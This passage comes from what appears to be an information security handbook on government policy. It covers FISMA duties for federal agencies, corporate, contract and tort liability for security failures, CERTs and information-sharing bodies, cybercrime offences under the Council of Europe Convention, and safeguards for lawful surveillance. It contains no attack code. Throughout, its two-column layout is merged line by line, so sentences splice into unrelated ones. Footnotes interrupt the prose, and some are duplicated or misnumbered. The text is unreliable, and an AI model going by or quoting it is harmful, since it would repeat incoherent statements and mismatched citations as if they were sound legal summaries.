(focusing for the moment on the security efforts throughout the civilian, national security of government systems) is the promulgation security, and law enforcement agencies, and to provide of guidelines or the enactment of any necessary laws for the development and maintenance of minimum addressing cyber-security issues. Some countries, controls required to protect government information such as Japan and Italy, have approached this issue systems. The law acknowledges that commercially devel- through guidelines. In July 2000, the IT Security oped products offer dynamic and effective computer Promotion Committee at the Cabinet level issued security solutions for the government. It leaves to "Guidelines for IT Security Policy," requiring all offices individual agencies the selection of specific technical and ministries by FY2003 to implement an assessment hardware and software security solutions from among of IT security policies and to take other steps to raise commercially developed products. the level of security. In March 2001, Japan's Inter- Ministerial Council for Promoting the Digitization of FISMA requires the head of each agency to develop, Public Administration issued security guidelines for all document, and implement an agency-wide Information IT government procurements.138 In the United States, Security Program for the information systems that support where the Congress concluded that the Executive the operations of the agency, including those provided or Branch was not adequately improving the security of managed by contractors.141 The program must include: 137International cooperation has been a major theme of the G8, see Presidents' Summary: Meeting of G8 Ministers of Justice and Home Affairs, Paris, May 5, 2003, http://www.g8.utoronto.ca/justice/justice030505.htm, and of the OECD as well. 138http://www.kantei.go.jp/foreign/it/network/priority-all/7.html. Italy's Minister for Innovation and technologies issued "The government's guidelines for the development of the information society" in June 2002. http://www.innovazione.gov.it/eng/documenti/linee_guida_eng.pdf. The audit office of New South Wales, Australia has issued a checklist for governments called "Implementing e-Government - Being Ready," http://www.audit.nsw.gov.au/guides-bp/e-govt-BPG.pdf, which includes a chapter on security. 139Federal Information Security Management Act, Title III of the E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA- final.pdf. FISMA is discussed further below. 140Federal Information Security Management Act, Title III of E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA-final.pdf and http://www.fedcirc.gov/library/legislation/FISMA.html. Parts of FISMA are codified in Titles 40 and 44 of the United States Code. 141Title 44, United States Code, section 3544. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 173 ·Periodic assessments of the risk and magnitude of practices and on compliance with each element of the the harm that could result from the unauthorized required agency-wide Information Security Program. access, use, disclosure, disruption, modification, or Additionally, the adequacy and effectiveness of informa- destruction of information or systems. tion security policies, procedures, and practices must be addressed in a number of other plans and reports, ·Policies and procedures that: including those relating to annual agency budgets, pro- gram performance, financial management, and internal o are based on the risk assessments; accounting and administrative controls. Any deficiencies o cost-effectively reduce information security risks; in policies, procedures, and practices that are identified o ensure that information security is addressed must be reported to OMB and the Congress.142 throughout the life cycle of each agency information system; and Annually, each agency must have an independent security o ensure compliance with OMB requirements and evaluation performed to determine the effectiveness of security standards. its information security program and practices. Each evaluation must include testing of the effectiveness of ·Subordinate plans for providing adequate informa- information security policies, procedures and practices tion security for networks, facilities, and systems or of a representative subset of the agency's information groups of information systems. systems, and an assessment of compliance with relevant information security policies, procedures, standards, ·Security awareness training for agency personnel, and guidelines.143 contractors, and other users of information systems that support the operations of the agency. FISMA requires the Director of OMB to oversee the development and implementation of all information ·Periodic testing and evaluation (not less than annually) security policies and practices. FISMA also vests authority of the effectiveness of information security policies, in the National Institute of Science and Technology procedures and practices, which includes testing of to develop standards and guidelines for minimum management, operational, and technical controls. information security requirements144 and requires the Director of OMB to oversee agency compliance with ·A process for planning, implementing, evaluating, these requirements and to review at least annually and documenting remedial action to address any agency information security programs. The OMB Director P deficiencies in the information security policies, pro- is charged with reporting annually to Congress on the ART cedures, and practices of the agency. agencies' performance.145 ·Procedures for detecting, reporting, and responding to security incidents. FOUR ·Plans and procedures to ensure continuity of operations for information systems that support the operations and assets of the agency. Each agency is required to submit an annual report to the Director of the Office of Management and Budget (OMB, part of the Executive Office of the President) and to Congressional committees on the adequacy and effec- tiveness of information security policies, procedures and 142Id. 143Title 44, United States Code, section 3545. 144Title 40, United States Code, section 11331. 145Title 44, United States Code, section 3543. 174 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 3. While this area of the law is barely emerging even in THE ROLE OF LAW AND GOVERNMENT developed countries, part of the legal and policy debate in POLICY VIS-À-VIS THE PRIVATE any nation concerning cyber-security should include con- SECTOR sideration of how traditional legal concepts apply to the risks and responsibilities of computer security. Traditional Legal Responsibilities Translated to Cyberspace In this section, we discuss the ways in which legal policies of general applicability are being extended to cyber-security. In Chapter 4, we discuss governmental Businesses have an incentive to maintain the security policies that are specifically designed to promote of their information systems because their profitability cyber-security in the private sector. depends on it. In a variety of ways, if a company does not protect itself against cyber failures, it could suffer Laws Regarding Corporate Governance, the losses that directly affect its profitability. Cyber-security Registration and sale of Corporate breaches can result in substantial interruption of a com- Securities, and Accounting pany's business and tarnish its reputation. An attack on a corporation's computer network may shut down opera- Under company/corporate law, an entity's officers and tions or result in damage to or loss of information such directors may have a fiduciary obligation to the corpo- as customer data or trade secrets. Any company that ration and its shareholders to use reasonable care in fails to provide security may lose customers to competitors overseeing the corporation's business operations. that do take security seriously. If makers of computers Increasingly, it is being recognized that this duty and software build insecure products, they risk extends to matters of computer security. Some writers losing customers. have noted that where corporate officers and directors are negligent in failing to take appropriate steps to In addition to pure market forces, many legal principles assess the threat of cyber-security breaches and can create incentives for cyber-security.146 Corporations to insist that management protect the corporation are subject to a web of legal responsibilities arising accordingly, the directors may be liable for damages from traditional concepts of corporation or company in lawsuits brought by shareholders.147 law, contracts, and civil liability for intentional or negli- gent infliction of loss, to name a few. Corporations are In the United States, this kind of legal obligation, arising also subject to relatively more modern regulatory obli- from general rules of corporate law (promulgated at the gations related to the registration and sale of securities state level), has been strengthened by federal statutory on public exchanges and to unfair and deceptive trade obligations. The Sarbanes-Oxley Act of 2002 imposes a practices, for example. Increasingly, attention is being number of new requirements on the sale of corporate given to how these traditional legal responsibilities securities, prompted in large part by accounting scan- might apply to cyber-security issues. Regulatory agen- dals. Congress determined that cyber-security had cies are already determining by rulemaking or case-by- become vital to the soundness of a corporation's financial case adjudication that regulatory systems of fair trade data. Therefore, Congress included a requirement that a or public disclosure apply to computer security issues as corporation's auditors publicly attest to the security of the well as traditional misconduct or vulnerabilities. In legal corporations' information systems.148 systems where judges have authority to extend general legal concepts to new situations, judges could resolve lawsuits involving cyber-security by deciding that a traditional legal concept (such as negligence or the duties of contractual performance) applies to computer failures. 146See the excellent article by Thomas J. Smedinghoff, "The Developing U.S. Legal Standard for Cyber-security," Baker & McKenzie, Chicago (May 3, 2003), http://www.bmck.com/ecommerce/us%20cyber-security%20standards.pdf 147Benjamin Wright, "The Legal Risks of Computer Pests and Hacker Tools," Password (the ISSA Magazine), Feb. 2002, http://www.tecmetrics.com/legal_risks.htm. 148Sarbanes-Oxley Act of 2002, Pub. Law 107-204. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 175 Also under the law in various companies, publicly traded the company could be subject to a claim for negligence. corporations must undergo annual financial audits by Where a company's computers are used to launch a independent accounts. As accountants recognize that cyber attack against a third party, there may be cyber-vulnerabilities may threaten the financial viability potential for tort liability if the company failed to take of a company, accountants increasingly including cyber- widely-accepted measures to prevent its computers from security in the scope of their audits. A number of being hijacked. Where an attack is launched by a com- organizations have developed standards or guidelines pany employee, victims may be able to obtain relief by for use by auditors.149 showing that the defendant company engaged in negligent hiring or supervisory practices.153 Contract Law For now, this is an area of the law that remains Businesses may also have a responsibility under undeveloped, even in the United States, where tort contract law to protect the data of their customers from lawsuits are common for a wide range of injuries. So far, unauthorized access or destruction resulting from a courts have not held that there is a general legal duty cyber-security breach. Applying basic contract law to maintain one's network secure. However, it may be principles in the cyber context, a company that represents just a matter of time before traditional theories of lia- that its system is secure, whether in a service contract bility are applied to the field of computer security. At or a privacy and security promise appearing on its web- such time, courts could find the standard of care for site, could arguably be deemed to have entered into an computer security in industry "best practices," guides agreement with a customer who has agreed to the con- and manuals issued by regulators or trade associations, tract or has proceeded to interact with the company in and standards adopted by self-regulatory bodies.154 reliance on those assurances.150 This company may be subject to claims for breach of contract if the security of customer information is compromised in a cyber attack. Companies that offer web-based services may also have contractual responsibilities to consumers to maintain the availability of these services. If a site is rendered inoperable by a denial of service attack, the company may be subject to customer claims for breach of contract.151 P ART Tort Law Theoretically, the legal doctrine of torts (civil liability for the intentional or negligent causing of injury) could FOUR have application to various kinds of computer security failures.152 For example, applying traditional tort theory to the cyber context, if a company fails to take reason- able measures to protect a customer's information from unauthorized disclosure as a result of a cyber-attack, 149See, e.g., the Information Systems Audit and Control Association, http://www.isaca.org. 150See, e.g., Michael Nugent, It Can't Happen Here, Wall Street Technology Association, Ticker, A Technology Magazine For Industry Profession (2003) (Nugent), http://www.wsta.org/publications/articles/0402_article03.html. 151Id 152Margaret Jane Radin, "Distributed Denial of Service Attacks: Who Pays?, http://www.mazunetworks.com/white_papers/radin-print.html; Sarah Scalet, "See You in Court," CIO Magazine, Nov. 1, 2001, http://www.cio.com/archive/110101/court_content.html. 153Id., Michael Nugent, It Can't Happen Here, Wall Street Technology Association, Ticker, A Technology Magazine For Industry Profession (2003), http://www.wsta.org/publications/articles/0402_article03.html. 154As is made clear throughout this handbook, there is a growing body widely accepted computer security standards, ranging from the Organization for Economic Cooperation and Development (OECD) Guidelines for the Security of Information Systems to the information security standards adopted by non- governmental standards bodies. See, e.g., Nugent, supra note ____(43) . 176 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 4. U.S. Commerce Department. NIST's mission is to develop GOVERNMENT CYBER-SECURITY and promote measurement, standards, and technology POLICIES to enhance productivity, facilitate trade, and improve the quality of life. Increasingly, governments are recognizing that they NIST's Computer Security Division works to improve need to adopt policies that specifically address the information systems security by: issue of computer security in the private sector. This may include the adoption of legislation imposing cer- ·Raising awareness of IT risks, vulnerabilities, and tain duties on private sector corporations. Experience protection requirements; has shown that tailoring the level of regulatory inter- ·Researching, studying, and advising agencies about vention to the particular facts and circumstances at IT vulnerabilities; hand is a key ingredient to successful regulation.155 With ·Devising techniques for the cost-effective security of this caution in mind, governments are beginning to sensitive Federal systems; impose duties on private sector, without mandating par- ·Developing standards, metrics, tests, and validation ticular technologies or standards. In Europe, responsi- programs to promote, measure, and validate security bility for computer security is imposed across all sectors in systems and services; by the Data Protection Directive.156 In Singapore, the ·Establishing minimum security requirements for government has made computer security a component Federal systems; and of the regulatory requirements for the financial sector, ·Developing guidance to increase secure IT planning, broadly defined. In the United States, in recent years, implementation, management and operation.158 federal legislation has been adopted imposing explicit computer security responsibilities on the banking industry In sharing research publicly, government agencies may and the health care industry.157 We discuss these more need to overcome a tradition of secrecy. The normally fully below, but first we emphasize some of the impor- super-secret National Security Agency in the United tant roles the government can play vis-à-vis the private States has posted on its public web site its Security sector without regulation. Recommendation guides.159 Non-regulatory Roles of Government Standards: The government is also an important participant in private sector standards setting processes. There are a number of ways in which government can Standards processes are non-regulatory, voluntary, and directly influence the security of privately owned and consensus-based, but government experts may make operated computer systems. Not all of these policy important contributions, especially if the government options are regulatory; many of the most effective supports its own computer security research. options may be non-regulatory in nature. Awareness, Education, and Capacity-Building: Research: An important role for the government is in Another major non-regulatory role of the government conducting and funding research on computer security. is to educate the public and work with the private The U.S. National Institute of Standards and Technology sector to promote awareness of vulnerabilities and (NIST) is a non-regulatory federal agency within the 155See, Smedinghoff, supra note ___(39). 156Directive 95/46/EC of the European Parliament and of the Council of 24 October 1995 on the protection of individuals with regard to the processing of personal data and on the free movement of such data, Official Journal L 281/31, Nov. 23, 1995, http://europa.eu.int/smartapi/cgi/sga_doc?smartapi!celexapi!prod!CELEXnumdoc&lg=EN&numdoc=31995L0046&model=guichett. 157Health Insurance Portability and Accountability Act of 1996, Pub. Law 104-191, http://aspe.hhs.gov/admnsimp/pl104191.htm; Financial Services Modernization Act of 1999, Pub. Law 106-102, Nov. 12, 1999, 15 U.S.C. Section 6801 et seq., http://www4.law.cornell.edu/uscode/15/6801.html; http://www.ftc.gov/privacy/glbact/. 158NIST's Computer Security Resource Center (CSRC) publishes information on a broad range of security topics, including cryptographic standards and applications, security testing, security research, system certification and accreditation guidelines, return on security investments, small business computer security, and federal agency security practices. http://csrc.nist.gov/. NIST publications are available at http://csrc.nist.gov/publications/index.html. 159National Security Agency, Security Recommendation Guides, http://nsa1.www.conxion.com/. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 177 responses.160 Special studies and reports of the kind seven industry sponsors and the German Government. described above are one means of accomplishing this Multinational structures are being created to promote goal. The European Commission has called on Member information sharing regionally and internationally. States to launch public education and awareness cam- In June 2001, the European Commission issued a paigns, including mass media and efforts targeted at all Communication calling for a strengthening of the CERT stakeholders. Convening of expert bodies and issuance system in Europe and better coordination among the of reports and strategy documents help raise awareness. CERTs operating in Member States.163 In February 2003, Education also includes scholarship and human the Commission took a further step, announcing its resources development programs. The European intent to establish a Network and Information Security Commission has recommended that education systems Agency to build on national efforts regarding cyber- of Member States should give more emphasis to courses security and to serve as a coordinating and advisory focused on computer security. entity.164 APEC has launched an initiative for a regional CERT aimed at providing in-country training to enhance Information Sharing: Another important government CERT capabilities in developing countries in the region role is to promote information sharing about computer and to develop CERT guidelines.165 The G8 has created a security vulnerabilities, warnings of new viruses and network of "24x7 contacts" ­ round-the-clock duty attacks, and recommendations on solutions, patches, offices at law enforcement agencies to facilitate infor- and best practices.161 The government may fund such mation sharing and cooperation in criminal investigations information sharing centers, such as the CERT of cybercrimes. Non-G8 nations may participate166. (Computer Emergency Response Team) coordination cen- ters that are being established around the globe. For Alternatively, the government may promote the creation example, the U.S. CERT at Carnegie Mellon University is of privately funded, voluntary information sharing sys- a federally funded research and development center that tems, such as the Information Sharing and Analysis provides assistance in handling computer security inci- Centers (ISACs) that are operating in various forms dents and vulnerabilities, publishing security alerts, around the globe. For instance, the United States has researching long-term changes in networked systems, and established industry ISACs for certain sectors (such as developing security information and training materials.162 the financial services sector, the telecommunications Other countries that have established or are establish- sector, and the electrical power industry), and other ing CERT centers include Malaysia, Japan, Australia, and countries, such as Canada, Germany, Japan, and the Korea. Mcert is a CERT for small and medium sized Netherlands, have ISACs as well. The UK is pursuing the P enterprises in Germany, created as a public-private WARP Concept (Warning, Advice & Reporting Point), ART partnership by Germany's ICT Association BITKOM, an initiative to establish a `network' across the UK to FOUR 160Awareness is the first principle in the OECD's computer security guidelines. Organization for Economic Cooperation and Development, OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034292.pdf. The G8 has recommended that countries should raise awareness to facilitate stakeholders' understanding of the nature and extent of their critical informa- tion infrastructure, and the role each must play in protecting them. In addition, the G8 has recommended that countries conduct training to enhance their response capabilities. Presidents' Summary: Meeting of G8 Ministers of Justice and Home Affairs, Paris, May 5, 2003, http://www.g8.utoronto.ca/justice/justice030505.htm. 161Information sharing has been a major themes of most international initiatives, including those of the G8. OAS and APEC. 158NIST's Computer Security Resource Center (CSRC) publishes information on a broad range of security topics, including cryptographic standards and applications, security testing, security research, system certification and accreditation guidelines, return on security investments, small business computer security, and federal agency security practices. http://csrc.nist.gov/. NIST publications are available at http://csrc.nist.gov/publications/index.html. 162National Security Agency, Security Recommendation Guides, http://nsa1.www.conxion.com/. 163European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM(2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm. 161Information sharing has been a major themes of most international initiatives, including those of the G8. OAS and APEC. 164European Commission, Proposal for a Regulation of the European Parliament and of the Council Establishing the European Network and Information Security Agency, Feb. 11, 2003, COM(2003) 63 final, 2003/0032 (COD), http://europa.eu.int/information_society/eeurope/action_plan/safe/documents/nisa_en.pdf. 165"Protecting Developing Economies from Cyber Attack ­ Assistance to Build Regional Cyber-security Preparedness," APEC Media Release, Mar. 18, 2003, http://www.apecsec.org.sg/whatsnew/press/PressRel_ProtectgFromCyberAttack_180303.html. 166G8, Meeting of Justice and Interior Ministers - Action Plan, Dec. 10, 1997, http://birmingham.g8summit.gov.uk/prebham/washington.1297.shtml. 178 INFORMATION SECURITY AND GOVERNMENT POLICIES provide better and more timely advice and and enforcement efforts, and the preservation and timely warnings relating to electronic attack, and for sharing of electronic data and evidence. Resolution receiving incident reports. 55/63 also recommends educating law enforcement authorities and the general public on cybercrime issues. The government may also form public-private committees or fora for exchange of security-related information. An Substantive Criminal Law Offenses example is the U.S. National Security Telecommunications There are various ways to conceptualize cybercrimes, Advisory Committee (NSTAC), which is composed of 30 and various names exist for specific offenses, but in chief executives representing major communications and general, laws addressing cybercrime issues have crystallized network service providers and information technology around four kinds of activity: companies and government officials responsible for national security and emergency communications · Data interception: intentional interception, without systems.167 NSTAC provides industry-based advice to right, of non-public transmissions of computer data. the President on issues and problems related to This covers interception of email of another person, implementing national security and emergency for example, and is aimed at protecting the confi- preparedness communications policy. dentiality of communications. Some legal frameworks already make it a crime to intercept telephone con- Criminal Law versations without legal authorization, for example. This well-known concept in the telecom world could Another way in which the government protects private have analogous application in the cyber context. systems is through the criminal law. International and regional institutions have recommended that every · Data interference: intentional damage to, deletion, nation, as part of the legal framework promoting trust degradation, alteration, or suppression of data in and confidence in cyberspace, should adopt basic criminal someone else's computer without right. This covers, laws against activities that attack the confidentiality, for example, intentionally sending viruses that delete integrity, or availability of computer data and computer files, or hacking a computer and changing or deleting systems.168 The framework of applicable criminal law data, or hacking a web site and changing its appear- comprises both substantive as well as procedural law, ance. The element of intent is important to distinguish implicating search and seizure as well as privacy concepts criminal activity from mere production of defective that may have unique application in the cyber context. software or unintentionally forwarding viruses . The UN was perhaps the first international body to · System interference: intentionally causing serious recognize the importance of addressing cybercrime.169 hindrance, without right, to the functioning of a In December 2000 and January 2002, the UN General computer system by inputting, transmitting, damag- Assembly adopted Resolutions 55/63 and 56/121 on ing, deleting, deteriorating, altering, or suppressing Combating the Criminal Misuse of Information computer data. This covers things like denial of Technologies.170 Resolution 55/63 declares that states service attacks or introducing viruses into a system should review their laws to eliminate "safe havens" in ways that interfere with its normal usage. for those who carry out cybercrime. Resolution 55/63 "Serious harm" is an element of this offense that recommends, inter alia, that states take appropriate distinguishes criminal activity from other, ordinary measures to prevent the criminal misuse of information online behavior, such as sending one or just a few technologies, international cooperation in investigation unsolicited emails. 167See http://www.ncs.gov/NSTAC/attf.html 168International bodies recommending adoption of cybercrime laws include the UN, EU, COE, G8, APEC, and OAS. For an extended discussion of the activi- ties and recommendations of these and other international bodies regarding cybercrime, see, Westby Guide, supra note ___. 169In 1995, the UN issued under its International Review of Criminal Policy the United Nations Manual on the Prevention and Control of Computer-Related Crime (1995) http://www.uncjin.org/Documents/EighthCongress.html. 170UN General Assembly, Resolution 55/63, Combating the criminal misuse of information technologies, Dec. 4, 2000, http://www.unodc.org/pdf/crime/a_res_55/res5563e.pdf ; UN General Assembly, Resolution 56/121, Combating the criminal misuse of information technolo- gies, Jan. 23, 2002, http://www.unodc.org/pdf/crime/a_res_56/121e.pdf . See also UN Resolution 57/239 (2002). Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 179 · Illegal access: intentionally accessing, without right, These would include, for example, sending electronic the computer system of another. It can be thought of mail without it having been first solicited by the recipi- as the cyberspace equivalent of trespass. (Looked at ent; accessing a web page, directly or through hypertext another way, illegal access is an offense against the links; or using "cookies" or "bots" to collect information. confidentiality of stored data and therefore is analo- (Para. 46, 48.)172 gous to illegal interception, which is an offense against the confidentiality of data in transit.) In some Computer-facilitated Crime legal systems, the definition of the crime of illegal access is limited to situations in which confidential Discussions of computer crime often extend into activities information (medical or financial information) is that are not crimes against computers, but are crimes taken, copied or viewed or where there is an intent to facilitated by the use of computers. For example, theft obtain confidential information or where access is and fraud are crimes in virtually every legal system obtained only by defeating security measures. whose laws were crafted in the "offline" world. But theft and fraud can equally take place in the "on-line" The Council of Europe has adopted a Convention that world. Similarly, crimes such as infringement of intellec- addresses these points.171 tual property rights or dissemination of child pornogra- phy, also are not limited to computer crimes ­ but they Articles 2-5 of the Council of Europe Convention on are crimes that may be facilitated by use of a computer. Cybercrime address these four basic cybercrimes. However, In many cases, existing criminal sanctions apply to in the Convention itself these provisions are drafted in offenses committed online. A critical analysis of a mul- broad terms that could cover a wide range of common tiplicity of factors would need to be taken into account behavior. The Convention also has an Explanatory Report to assess not only whether existing criminal laws apply that aids in interpreting the Convention. Article 2 of the both online and offline, but also whether special, Convention calls upon states to establish as a criminal separate offenses for computer-related crime or crime offense "when committed intentionally, the access to the facilitated by a computer would be necessary. whole or any part of a computer system without right" (emphasis added). On its face, this provision could Articles 7-10 of the Council of Europe Convention on arguably make it a crime to send an unsolicited email, Cybercrime depart from this principle, and reach more since the sender of an unsolicited email "accesses" the broadly, covering crimes involving the use of a comput- recipient's computer (or the mail server of the recipient's er to engage in conduct that is normally already a crime P ISP) without right. Nations following the Therefore it is offline (i.e., forgery, fraud, and the distribution, produc- ART key in interpreting the Council of Europe Convention on tion or possession of child pornography, and copyright Cybercrime to clarify whether "without right" is meant to infringement to name a few). Adopting special provi- include common activities inherent in the Internet. The sions for computer-facilitated offenses may be unneces- Explanatory Report states, "legitimate and common activ- sary in some legal systems and might improperly FOUR ities inherent in the design of networks, or legitimate suggest that a crime committed online is worse than and common operating or commercial practices should the same crime committed offline.173 not be criminalized." (Para. 38.) 171The treaty, ETS no. 185, is online at http://conventions.coe.int/treaty/EN/cadreprincipal.htm along with an extensive Explanatory Report. It is very important that nations looking to the convention as a model also carefully consider the Explanatory Report, which has extensive explanations of the meaning of the treaty's sometimes cryptic provisions. The convention, which has not taken effect as of August 2003, has some positive and some negative elements. The convention is very broad, reaching far beyond computer crime as such. And while it requires signatories to adopt laws giving the govern- ment access to computer data (for all crimes) and while it states that such powers must be subject to procedural safeguards protecting privacy, the treaty fails to specify such procedural safeguards. Accordingly, developing countries should be cautious in approaching the Council of Europe convention as a model. A major section of the treaty aims to require governments to cooperate with other countries seeking to search and seize computers, compel disclo- sure of data stored in computers, and carry out real-time interceptions ­ in all kinds of criminal cases ­ in other countries. It also covers extradition for computer crimes as defined under the treaty. 172Further point of caution: the Explanatory Report also states that the phrase "without right" may refer to conduct undertaken without contractual authority. This interpretation seems unwise, for it could make violations of a service provider's terms of service into a criminal offense. 173That said, child pornography, which is internationally condemned, is easily facilitated by computers and governments should be sure that their laws adequately prohibit the production and dissemination of such material, lest they become havens for its production or online hosting. Likewise, protection of intellectual property is one of the important building blocks of cyberlaw. 180 INFORMATION SECURITY AND GOVERNMENT POLICIES Application of basic criminal law concepts Government seizures or compelled disclosures of data Nations may also want to consider how common concepts stored in computers and government interceptions of of the criminal law such as "aiding and abetting" or communications and traffic data constitute an intrusion "attempt" apply to cybercrime. Thus, if a law has the on personal privacy and therefore need to be subject to concept of an attempted offense, then that concept procedural safeguards.174 As the OECD states in its might apply to cybercrime. For example, launching a virus Guidelines for the Security of Information Systems and with intent to disrupt service might be a crime under the Networks, "Security should be implemented in a manner concept of intent even if the virus didn't work as intend- consistent with the values recognized by democratic soci- ed. Similarly, if a nation's law has the concept of aiding eties including the freedom to exchange thoughts and and abetting, that might be applied to cyber-crime, such ideas, the free flow of information, the confidentiality that one who intentionally produces a virus and provides of information and communication, the appropriate it to another knowing or intending that it will be used to protection of personal information, openness and destroy data or interfere with a system may be guilty of transparency."175 The European Commission has stated, data or network interference caused by the virus even if "Protection of privacy is a key policy objective in the the virus was introduced into a network by someone else. European Union. It was recognized as a basic right under Article 8 of the European Convention on human rights. Privacy Protections Articles 7 and 8 of the Charter of Fundamental Rights of the EU also provide the right to respect for family and Consideration of cybercrime often leads to questions private life, home and communications and personal about the standards under which the government is data."176 Especially in developing and transitional authorized to obtain access to the electronic communica- societies, unregulated government surveillance can tions and computer data that may constitute evidence of seriously undermine trust in the Internet. cybercrime and other types of crime. Many countries have procedural laws granting the government investigative UN Resolution 55/63 (December 2000) provides that powers to access information stored in computers. These states, as they adopt laws regarding investigative access include judicial orders for the disclosure of stored data to communications and computer data, should protect and warrants for the immediate search and seizure of individual freedoms and privacy. In 1990, the Eighth UN computers and computerized data. Many countries also Congress on the Prevention of Crime and the Treatment of allow real-time interception of communications and the Offenders issued a series of recommendations concerning traffic data or transactional data that shows the origin the adoption of investigative procedures, evidentiary and destination of communications. A major part of the rules, forfeiture, and international cooperation in cyber- Council of Europe Convention on Cybercrime requires crime investigations.177 In 1995, the UN published its governments to adopt laws on search and seizure of Manual on the Prevention and Control of Computer-Related computer evidence, disclosure to governments of Crime.178 This extensive document examines a wide range computerized records of any kind, and electronic of issues related to crime and technology, including interception of communications ­ for all kinds of crimes. procedural law, substantive criminal law, international cooperation, data protection, security, and privacy. 174The right to privacy is recognized as a fundamental human right under the Universal Declaration of Human Rights, the International Covenant on Civil and Political Rights, the European Convention on Human Rights, and the American Convention on Human Rights. 175Ehttp://www.oecd.org/document/42/0,2340,en_2649_201185_15582250_1_1_1_1,00.html 176European Commission, Communication from the Commission to the Council, the European Parliament, the European Economic And Social Committee and the Committee of the Regions - Network and Information Security: Proposal for a European Policy Approach, June 6, 2001, COM (2001) 298 final, http://europa.eu.int/information_society/eeurope/news_library/new_documents/index_en.htm. 177Eighth United Nations Congress on the Prevention of Crime and the Treatment of Offenders, Havana, Aug. 27-Sept. 7, 1990, report prepared by the Secretariat, UN publication, Sales No. E.91.IV.2, chap I. For the text of these recommendations, see United Nations Commission on Crime Prevention and Criminal Justice, Report on the Eighth Session, Apr. 27-May 6, 1999, E/CN.15/1999/12, http://www.un.org/documents/ecosoc/docs/1999/e1999-30.htm. 178UN, International Review of Criminal Policy - United Nations Manual on the Prevention and Control of Computer-Related Crime, http://www.uncjin.org/Documents/EighthCongress.html. 179Another valuable resource is the report of UN Economic and Social Council's Commission on Crime Prevention and Criminal Justice effectively summa- rizes UN and other international work in the cybercrime and cyber-security area. Effective measures to prevent and control computer-related crime, E/CN.15/2002/8, Report of the Secretary-General, United Nations, Economic and Social Council, Commission on Crime Prevention and Criminal Justice, Eleventh Session, Vienna, Apr. 16-25, 2002, http://www.unodc.org/pdf/crime/commissions/11comm/8e.pdf. Information Technology Security Handbook INFORMATION SECURITY AND GOVERNMENT POLICIES 181 Likewise, the Council of Europe Convention on Under most advanced legal systems, interception of Cybercrime explicitly requires that interceptions of com- electronic communications is permissible, but only in munications and searches and seizures for stored data accordance with clear standards in the law, requiring be conducted pursuant to the privacy principles set justification and prior independent approval, which in forth in the European Convention on Human Rights. many legal systems means approval by a judge. Article 15 of the Cybercrime Convention provides: Governments addressing interception and data access issues must be sure to address the procedural standards 1.Each Party shall ensure that the establishment, for government access to communications and computer implementation and application of the powers and data. An emerging body of international experience pro- procedures provided for in this Section are subject vides useful guidance. Based upon developing national to conditions and safeguards provided for under its and international standards,180 it is possible to identify domestic law, which shall provide for the adequate the following procedural safeguards regulating the protection of human rights and liberties, including interception of communications: rights arising pursuant to obligations it has under- taken under the 1950 Council of Europe Convention · The standards for interception are transparent, fully for the Protection of Human Rights and Fundamental and clearly spelled out in legislation available to the Freedoms...and other applicable international human public, with sufficient precision to protect against rights instruments, and which shall incorporate the arbitrary application and so that citizens are aware principle of proportionality. of the circumstances and conditions under which public authorities are empowered to carry out 2.Such conditions and safeguards shall, as appropriate such surveillance. in view of the nature of the power or procedure con- · Approval is obtained from an independent official cerned, inter alia, include judicial or other independ- (preferably a judge),181 based on a written application ent supervision, grounds justifying application, and giving reasons and setting forth facts justifying the limitation on the scope and the duration of such intrusion, and the approval should be manifested in power or procedure. written order. · Surveillance is limited only to the investigation of Surveillance Standards specified serious offenses. · Approval is granted only upon a strong factual showing The Council of Europe Convention on Cybercrime itself does of reason to believe that the target of the search is P not spell out specific surveillance procedures that would engaged in criminal conduct. ART comply with the European Convention of Human Rights. · Approval is granted only when it is shown that other Those are found instead in the decisions of the European less intrusive techniques will not suffice. Court of Human Rights (summarized below), as well as in · Each surveillance order should cover only specifically the surveillance laws of countries like Canada and the designated persons or accounts ­ generalized monitoring FOUR United States that have strong traditions of an independ- is not permitted. ent judiciary and protection of privacy. Especially in devel- · The rules are technology neutral ­ all one-to-one oping and transitional societies, which may not have a communications are treated the same, whether they fully defined set of rules for searches and seizure and sur- involve voice, fax, images or data, wire line or wireless, veillance in the offline world, it is important to give close digital or analog. attention to the development of strong standards for gov- · The scope and length of time of the interception are ernment surveillance in the digital context. limited, and in no event is the surveillance extended longer than is necessary to obtain the needed evidence. 180Perhaps the most developed body of international law on communications interception can be found in Europe, where the basic privacy principle in Article 8 of the European Convention of Human Rights has been given greater definition by the European Court of Human Rights (ECHR). The principles outlined here are drawn from the case law of the ECHR. Kopp v. Switzerland, Mar. 25, 1998, 27 EHRR 91; Klass v. Germany, 6 September 1978, 2 EHRR 214; Khan v. U.K., May 12, 2000, Reports of Judgments and Decisions, ECtHR, 2000-V; Halford v. U.K., June 25, 1997, Reports of Judgments and Decisions, ECtHR 1997-III; Huvig v. France, Apr. 24, 1990, 12 EHRR 528; Kruslin v. France, Apr. 24, 1990, 12 EHRR 547. 181Klass v. Germany, 6 September 1978, 2 EHRR 214 ("The Court considers that, in a field where abuse is potentially so easy in individual cases and could have such harmful consequences for democratic society as a whole, it is in principle desirable to entrust supervisory control to a judge."). 182 INFORMATION SECURITY AND GOVERNMENT POLICIES · The surveillance is conducted in such a way as to mandates for surveillance is beyond the scope of this reduce the intrusion on privacy to an unavoidable report. However, it should be noted that the Council of minimum necessary to obtain the needed evidence. Europe Convention on Cybercrime does not impose · The enabling legislation describes the use to which design mandates, technical standards, or data retention seized or intercepted material could be put; information requirements on service providers. The treaty only obtained for criminal investigative purposes may not establishes procedures for preserving, seizing, or access- be used for other ends. ing whatever data is otherwise available for business · The law specifies procedures for drawing up summary purposes, using whatever current technical capabilities reports for a judge's review and precautions to be companies may have. It does not require changes in taken in order to permit inspection of the recordings technology or business practices.182 The 